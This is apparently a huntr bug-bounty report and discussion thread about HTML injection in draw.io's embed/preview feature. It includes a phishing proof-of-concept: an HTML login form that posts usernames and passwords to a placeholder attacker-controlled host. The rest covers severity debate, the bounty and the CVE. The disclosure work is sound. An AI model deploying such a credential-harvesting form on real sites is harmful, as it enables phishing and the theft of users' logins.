Html Injection in jgraph/drawio

Valid

Reported on

May 6th 2022


Description

https://app.diagrams.net/ is vulnerable to html Injection by uploading a html file

Proof of Concept

  1. Goto https://app.diagrams.net/ and create a new html file with form field's and add this file in project
  2. Now goto file>embed>html and click on create after that click on preview page here we will see our all tags are rendered
  3. Now click on that form it will open new window with that form and click on print button
  4. Again click on preview to view preview of pdf and now you can enter username and password and submit it
  5. Form is working
  6. Rather than showing content of html file site will render it as html lead to html injection for eg if a file content a h1 tag it should look like this <h1>HTML tag</h1> Rather than rendering it

I have used this code for login page POC:- <html> <body> <h3>Login Form Post Method</h3> <div class="main" style="overflow:auto"> <fieldset class="fieldset">

  <form  action="https://Attacker control Host" method="post">
  
    <label  for="username">Username:</label>
    <input class="userbox" type="text" name="username" required="required" /><br />
    <label for="password">Password:</label>
    <input type="text" name="password" required="required" />
    <input  class="button" type="submit" value="submit" />
  
    </form>
  
  <p><a href="#">Forget Username?</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp</a><a href="#">Forgot Password?</a></p>
  </fieldset>
  
</div>
<p class="credit">Photo credit: More Than Me</p>

</body>

</html>

Impact

An attacker can trick victim to inject html in his browser

We are processing your report and will contact the jgraph/drawio team within 24 hours. 16 days ago
David Benson
16 days ago

Maintainer


Thanks for the report. What is the version under the help menu at app.diagrams.net?

Would it be possible to format the report by bullet points to list each step at a time please? It's difficult to understand the exact steps in this format. Many thanks.

Distorted_Hacker
16 days ago

Researcher


Hi its latest version 18.0.1 and you can find detail video over here https://youtu.be/fqk5jSzMRW4

Distorted_Hacker
16 days ago

Researcher


sorry i mean here POC

David Benson
16 days ago

Maintainer


Thanks for the detail. So, the form post is cross domain to any server?

Distorted_Hacker
15 days ago

Researcher


yes it send request to attacker control domain

David Benson
15 days ago

Maintainer


Thanks, we were able to repeat the issue. I agree the issue is valid, though I'm not sure the severity is high. The steps necessary from the user to provoke this are fairly rare for most users to follow.

If someone from huntr reads, is there a bug taxonomy like https://bugcrowd.com/vulnerability-rating-taxonomy availalbe?

Distorted_Hacker
15 days ago

Researcher


Hi thanks for your review but since a user can share his work with other users an attacker will create a while template and share it with user so user only have to go to print page where an attacker can host a proper phishing page with post method enable with cross domains

Distorted_Hacker
15 days ago

Researcher


And this is how an attacker can increase impact of this bug

Distorted_Hacker
15 days ago

Researcher


Hi according to bug crowd it's P3 medium severity issue you can change it to medium thanks

Distorted_Hacker
15 days ago

Researcher


An attacker can even share preview link to victim so there is no extra steps victim have to do

We have contacted a member of the jgraph/drawio team and are waiting to hear back 15 days ago
David Benson modified the Severity from High (8) to Medium (4.6) 15 days ago
David Benson
15 days ago

Maintainer


I’ve changed availabilty from high to none, since this doesn’t affect the availablity of the system.

In terms of the integrity (impact on the integrity of the exploited system), note that draw.io / diagrams.net doesn’t have any concept of a login. A user isn’t going to think they are logging into the site because there is no login. Why do you believe there is a high effect on the system integrity?

Confidentially describes the impact on the confidentiality of data processed by the system. There is no direct attack on data, since only the form contents can be extracted. The attack is around whether a user believe this is a real login screen, because they trust the domain. But I don’t see which login the user is being tricked into sending since we don’t have a site login. I think low is more appropriate in this case, it might even be none.

Would you agree with those changes?

David Benson modified the Severity from Medium to Low 15 days ago
David Benson
15 days ago

Maintainer


We've ended up at a low following our process.

I see that moving the issue away from high meant the disclosure bounty went to zero. Our project pays out a minimum of 300USD (for low severity), so we will ensure you receive the 300USD if this is rated as a low.

I'm talking to huntr in the week about the funding process, we'll either make the payment to you via them or direct if that's not possible.

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
David Benson validated this vulnerability 15 days ago
Distorted_Hacker has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
David Benson confirmed that a fix has been merged on 65f986 15 days ago
The fix bounty has been dropped
Distorted_Hacker
15 days ago

Researcher


Hi thanks for everything i just want to know can you assign cve for this ?

Jamie Slome
14 days ago

Admin


@davidjgraph - regarding the taxonomy, we do not currently have this available, but I'd love to invite you to create a feature request, if you think it is important :)

Distorted_Hacker
12 days ago

Researcher


@davidjgraph Hi any update ??

David Benson
12 days ago

Maintainer


I am speaking with huntr this week, I won't have any update until after I have spoken with them.

David Benson
10 days ago

Maintainer


The increase to the bounty payment will come from Huntr, once our org is onboarded onto their systems.

Jamie Slome
10 days ago

Admin


Hello all 👋

The researcher bounty for this report has now been bumped from $0 to $300.

Congratulations @jo125ker 🤝

Distorted_Hacker
10 days ago

Researcher


Thanks @davidjgraph @admin

Distorted_Hacker
8 days ago

Researcher


Hi @admin can you please assign cve

Jamie Slome
7 days ago

Admin


@davidjgraph - are you happy for us to proceed with assigning and publishing a CVE for this report?

David Benson
7 days ago

Maintainer


@jamieslome Sure, I don't see any reason to not assign a CVE, unless you have a minimum severity. Is the report purely based on the original post?

Jamie Slome
6 days ago

Admin


@davidjgraph - we do not currently auto-assign CVEs for None or Low severities. However, if you could provide us with a CVSS vector string, we can go ahead and publish a CVE for this report 👍

David Benson
6 days ago

Maintainer


OK, didn't see it was a low. Why a CVE for a low @gaurav-g2 ?

to join this conversation